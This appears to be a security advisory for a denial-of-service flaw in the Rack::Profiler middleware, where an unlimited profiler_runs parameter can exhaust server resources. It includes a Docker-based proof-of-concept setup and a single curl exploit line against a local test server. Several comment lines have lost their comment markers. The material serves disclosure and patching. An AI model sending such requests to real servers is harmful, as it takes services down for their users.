Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling due to the unconstrained value of the incoming profiler_runs parameter. An attacker can cause the server to allocate excessive resources, leading to a denial of service by sending crafted requests with large profiler_runs values.

config.ru file:

require 'rack'
require 'rack/contrib'

use Rack::Profiler # if ENV['RACK_ENV'] == 'development'
Define a Rack application
app = lambda do |env|
Your application logic goes here
  [200, {}, ["Hello World"]]
end
Run the Rack application
run app

A Dockerfile:

# Use the official Ruby image as a base
FROM ruby:latest

Set the working directory inside the container
WORKDIR /app
Copy the custom config.ru file into the container
COPY config.ru .
COPY Gemfile .
Install rack and the gems needed to run the app
RUN bundle install
Expose the port that rackup will listen on
EXPOSE 9292
Run rackup when the container starts
ENTRYPOINT ["rackup","--host","0.0.0.0","--port","9292"]
Health check
HEALTHCHECK --interval=3s --timeout=10s --start-period=2s --retries=3 CMD curl --fail http://localhost:9292/ || exit 1

A Gemfile:

source 'https://rubygems.org'

gem 'rack', '> 2.0'
gem 'rack-contrib', '> 2.4'
gem 'rackup'
gem 'ruby-prof'

A Docker compose:

services:
  app:
    build:
      context: .
    ports:
      - "9292:9292"

To run the PoC:

docker compose up --build

To exploit DoS:

curl  "http://127.0.0.1:9292/?profiler_runs=9999999999&profile=process_time"

• GitHub Commit
• Vulnerable Code